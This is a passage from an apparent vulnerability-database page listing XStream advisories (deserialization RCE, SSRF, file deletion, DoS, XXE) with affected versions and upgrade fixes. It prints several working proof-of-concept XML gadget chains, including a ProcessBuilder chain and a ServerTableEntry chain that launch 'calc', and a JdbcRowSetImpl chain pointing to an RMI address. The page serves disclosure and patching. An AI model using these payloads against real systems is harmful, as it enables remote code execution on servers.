              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
                      <jaxbType>com.sun.rowset.JdbcRowSetImpl</jaxbType>
                      <uriProperties/>
                      <attributeProperties/>
                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
                        <getter>
                          <class>com.sun.rowset.JdbcRowSetImpl</class>
                          <name>getDatabaseMetaData</name>
                          <parameter-types/>
                        </getter>
                      </inheritedAttWildcard>
                    </bi>
                    <tagName/>
                    <context>
                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
                        <outer-class reference='../..'/>
                      </marshallerPool>
                      <nameList>
                        <nsUriCannotBeDefaulted>
                          <boolean>true</boolean>
                        </nsUriCannotBeDefaulted>
                        <namespaceURIs>
                          <string>1</string>
                        </namespaceURIs>
                        <localNames>
                          <string>UTF-8</string>
                        </localNames>
                      </nameList>
                    </context>
                  </bridge>
                </bridge>
                <jaxbObject class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
                  <javax.sql.rowset.BaseRowSet>
                    <default>
                      <concurrency>1008</concurrency>
                      <escapeProcessing>true</escapeProcessing>
                      <fetchDir>1000</fetchDir>
                      <fetchSize>0</fetchSize>
                      <isolation>2</isolation>
                      <maxFieldSize>0</maxFieldSize>
                      <maxRows>0</maxRows>
                      <queryTimeout>0</queryTimeout>
                      <readOnly>true</readOnly>
                      <rowSetType>1004</rowSetType>
                      <showDeleted>false</showDeleted>
                      <dataSource>rmi://localhost:15000/CallRemoteMethod</dataSource>
                      <params/>
                    </default>
                  </javax.sql.rowset.BaseRowSet>
                  <com.sun.rowset.JdbcRowSetImpl>
                    <default>
                      <iMatchColumns>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                        <int>-1</int>
                      </iMatchColumns>
                      <strMatchColumns>
                        <string>foo</string>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                        <null/>
                      </strMatchColumns>
                    </default>
                  </com.sun.rowset.JdbcRowSetImpl>
                </jaxbObject>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker who has sufficient rights to execute local commands on the host only by manipulating the processed input stream.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
      <comparator class='sun.awt.datatransfer.DataTransferer$IndexOrderComparator'>
        <indexMap class='com.sun.xml.internal.ws.client.ResponseContext'>
          <packet>
            <message class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XMLMultiPart'>
              <dataSource class='com.sun.xml.internal.ws.message.JAXBAttachment'>
                <bridge class='com.sun.xml.internal.ws.db.glassfish.BridgeWrapper'>
                  <bridge class='com.sun.xml.internal.bind.v2.runtime.BridgeImpl'>
                    <bi class='com.sun.xml.internal.bind.v2.runtime.ClassBeanInfoImpl'>
                      <jaxbType>com.sun.corba.se.impl.activation.ServerTableEntry</jaxbType>
                      <uriProperties/>
                      <attributeProperties/>
                      <inheritedAttWildcard class='com.sun.xml.internal.bind.v2.runtime.reflect.Accessor$GetterSetterReflection'>
                        <getter>
                          <class>com.sun.corba.se.impl.activation.ServerTableEntry</class>
                          <name>verify</name>
                          <parameter-types/>
                        </getter>
                      </inheritedAttWildcard>
                    </bi>
                    <tagName/>
                    <context>
                      <marshallerPool class='com.sun.xml.internal.bind.v2.runtime.JAXBContextImpl$1'>
                        <outer-class reference='../..'/>
                      </marshallerPool>
                      <nameList>
                        <nsUriCannotBeDefaulted>
                          <boolean>true</boolean>
                        </nsUriCannotBeDefaulted>
                        <namespaceURIs>
                          <string>1</string>
                        </namespaceURIs>
                        <localNames>
                          <string>UTF-8</string>
                        </localNames>
                      </nameList>
                    </context>
                  </bridge>
                </bridge>
                <jaxbObject class='com.sun.corba.se.impl.activation.com.sun.corba.se.impl.activation.ServerTableEntry'>
                  <activationCmd>calc</activationCmd>
                </jaxbObject>
              </dataSource>
            </message>
            <satellites/>
            <invocationProperties/>
          </packet>
        </indexMap>
      </comparator>
    </default>
    <int>3</int>
    <string>javax.xml.ws.binding.attachments.inbound</string>
    <string>javax.xml.ws.binding.attachments.inbound</string>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

Users who follow the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.16 or higher.

[,1.4.16)
  • M
Server-Side Request Forgery (SSRF)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). A remote attacker can request data from internal resources that are not publicly available by manipulating the processed input stream.

Note: This vulnerability does not exist running Java 15 or higher, and is only relevant when using XStream's default blacklist.

How to fix Server-Side Request Forgery (SSRF)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.15 or higher.

[,1.4.15)
  • M
Arbitrary File Deletion

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary File Deletion. A remote attacker can delete arbitrary known files on the host as long as the executing process has sufficient rights, by manipulating the processed input stream.

How to fix Arbitrary File Deletion?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.15 or higher.

[,1.4.15)
  • H
Deserialization of Untrusted Data

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. The processed stream at unmarshalling time contains type information to recreate the formerly written objects. XStream creates therefore new instances based on these type information. An attacker can manipulate the processed input stream and replace or inject objects, that can execute arbitrary shell commands.

This issue is a variation of CVE-2013-7285, this time using a different set of classes of the Java runtime environment, none of which is part of the XStream default blacklist. The same issue has already been reported for Strut's XStream plugin in CVE-2017-9805, but the XStream project has never been informed about it.

PoC

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
        <dataHandler>
          <dataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'>
            <contentType>text/plain</contentType>
            <is class='java.io.SequenceInputStream'>
              <e class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'>
                <iterator class='javax.imageio.spi.FilterIterator'>
                  <iter class='java.util.ArrayList$Itr'>
                    <cursor>0</cursor>
                    <lastRet>-1</lastRet>
                    <expectedModCount>1</expectedModCount>
                    <outer-class>
                      <java.lang.ProcessBuilder>
                        <command>
                          <string>calc</string>
                        </command>
                      </java.lang.ProcessBuilder>
                    </outer-class>
                  </iter>
                  <filter class='javax.imageio.ImageIO$ContainsFilter'>
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>start</name>
                  </filter>
                  <next/>
                </iterator>
                <type>KEYS</type>
              </e>
              <in class='java.io.ByteArrayInputStream'>
                <buf></buf>
                <pos>0</pos>
                <mark>0</mark>
                <count>0</count>
              </in>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <string>test</string>
  </entry>
</map>

Note: 1.4.14-jdk7is optimised for OpenJDK 7, release 1.4.14 are compatible with other JDK projects.

How to fix Deserialization of Untrusted Data?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.14 or higher.

[,1.4.14)
  • H
Denial of Service (DoS)

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Denial of Service (DoS). When a certain denyTypes workaround is not used, mishandles attempts to create an instance of the primitive type 'void' during unmarshalling, leading to a remote application crash, as demonstrated by an xstream.fromXML("&lt;void/>") call.

How to fix Denial of Service (DoS)?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.10 or higher.

[,1.4.10)
  • M
Insecure XML deserialization

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Insecure XML deserialization. It could deserialize arbitrary user-supplied XML content, representing objects of any type. A remote attacker able to pass XML to XStream could use this flaw to perform a variety of attacks, including remote code execution in the context of the server running the XStream application.

How to fix Insecure XML deserialization?

Upgrade com.thoughtworks.xstream:xstream to version 1.4.7, 1.4.11 or higher.

[,1.4.7) [1.4.10,1.4.11)
  • H
XML External Entity (XXE) Injection

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again. Multiple XML external entity (XXE) vulnerabilities in the (1) Dom4JDriver, (2) DomDriver, (3) JDomDriver, (4) JDom2Driver, (5) SjsxpDriver, (6) StandardStaxDriver, and (7) WstxDriver drivers in XStream before 1.4.9 allow remote attackers to read arbitrary files via a crafted XML document.

[0.3,1.4.9)